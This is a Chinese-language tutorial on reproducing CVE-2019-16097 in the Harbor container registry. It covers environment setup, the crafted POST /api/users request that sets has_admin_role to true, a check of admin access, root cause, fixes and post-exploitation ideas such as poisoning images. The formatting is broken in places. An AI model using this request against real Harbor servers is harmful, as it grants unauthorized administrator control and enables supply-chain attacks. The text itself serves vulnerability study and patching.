如何进行Harbor任意管理员注册漏洞CVE-2019-16097的复现

# 如何进行Harbor任意管理员注册漏洞CVE-2019-16097的复现

## 漏洞概述

CVE-2019-16097是Harbor容器镜像仓库中的一个高危漏洞，影响版本为1.7.0至1.8.2。该漏洞允许攻击者通过构造特定请求，绕过注册验证机制，直接注册管理员账户，从而获得系统控制权。

## 环境准备

### 1. 漏洞环境搭建
推荐使用以下两种方式搭建测试环境：
- **Docker快速部署**（适用于测试）：
  ```bash
  docker run -d -p 80:80 -p 443:443 --name harbor-vulnerable vmware/harbor:v1.8.2

• 源码编译部署（需Go环境）：

  
  git clone https://github.com/goharbor/harbor
  git checkout v1.8.2
  ./make.sh install
  

2. 工具准备

• Burp Suite/Postman（用于构造请求）
• curl（命令行测试）
• Nmap（端口扫描验证）

漏洞复现步骤

步骤1：确认目标版本

访问Harbor Web界面，查看底部版本信息：

curl -k https://target-domain/api/systeminfo | grep "harbor_version"

步骤2：构造恶意注册请求

通过Burp Suite拦截正常注册请求，修改以下关键参数：

POST /api/users HTTP/1.1
Host: target-harbor.com
Content-Type: application/json

{
  "username": "eviladmin",
  "email": "evil@example.com",
  "password": "HackMe123!",
  "realname": "Hacker",
  "comment": "Exploit",
  "has_admin_role": true  // 关键参数
}

步骤3：发送请求并验证

• 成功响应：HTTP 201 Created
• 验证管理员权限：

  
  curl -u eviladmin:HackMe123! -k https://target-domain/api/users
  

  若返回所有用户列表，则证明提权成功。

漏洞原理分析

漏洞源于两个关键问题： 1. API端点鉴权缺失：/api/users接口未对has_admin_role参数做权限校验 2. 逻辑设计缺陷：用户注册流程中，前端验证可被绕过直接调用后端API

修复建议

1. 官方解决方案：

   • 升级至Harbor 1.8.3及以上版本
   • 补丁提交：GitHub Commit

2. 临时缓解措施：

   location /api/users {
    if ($request_method = POST) {
      set $block 1;
    }
    # 仅允许管理IP访问
    allow 192.168.1.100;
    deny all;
   }
   

深度利用场景

获得管理员权限后，攻击者可： 1. 上传恶意镜像污染供应链 2. 篡改现有镜像的扫描结果 3. 访问所有项目中的敏感信息 4. 通过webhook进行横向移动

法律与道德声明

⚠️ 重要提示： - 本复现方法仅限授权测试使用 - 未经授权的测试属于违法行为 - 建议在隔离环境（如本地Docker）进行复现 - 测试前需获得书面授权

参考资源

1. CVE官方公告
2. Harbor安全公告
3. 漏洞PoC代码
4. 容器安全最佳实践

”`

注：实际复现时请根据目标环境调整请求参数，建议在虚拟机环境中进行测试。完整复现过程通常需要15-30分钟，主要耗时在环境搭建和请求调试阶段。